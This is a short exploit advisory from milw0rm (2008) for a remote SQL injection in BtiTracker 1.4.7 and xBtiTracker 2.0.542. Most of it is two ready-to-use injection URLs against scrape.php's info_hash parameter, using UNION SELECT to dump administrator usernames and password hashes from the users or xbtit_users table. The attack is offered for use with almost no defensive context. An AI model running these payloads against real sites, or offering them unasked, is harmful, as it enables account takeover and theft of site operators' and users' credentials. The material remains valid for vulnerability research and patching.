BtiTracker 1.4.7_ xbtit 2.0.542 SQL Injection Vulnerability.pdf

1 ## BtiTracker/xBtiTracker Remote SQL Injection Vulnerability 2 ## Author: InATeam (http://inattack.ru/) 3 ## Affected versions: BtiTracker <= 1.4.7, xBtiTracker <= 2.0.542 4 ## Software site: http://www.btiteam.org/ 5 ## 6 ## ============================================================================== 7 ## Exploit: 8 ## ============================================================================== 9 ## http://site/scrape.php?info_hash=1%27) 10 ## +UNION+SELECT+0,CONCAT(0x3C623E,username,0x3a,password,0x3C2F623E3C62723E),0,0 11 ## +FROM+users+WHERE+id_level=8/* 12 ## ============================================================================== 13 ## for xBtiTracker we need to specify prefix: 14 ## ============================================================================== 15 ## http://site/scrape.php?info_hash=1%27) 16 ## +UNION+SELECT+0,CONCAT(0x3C623E,username,0x3a,password,0x3C2F623E3C62723E),0,0 17 ## +FROM+xbtit_users+WHERE+id_level=8/* 18 ## ============================================================================== 19 20 # milw0rm.com [2008−08−25] Page 1/1 BtiTracker 1.4.7, xbtit 2.0.542 SQL Injection Vulnerability InATeam 08/25/2008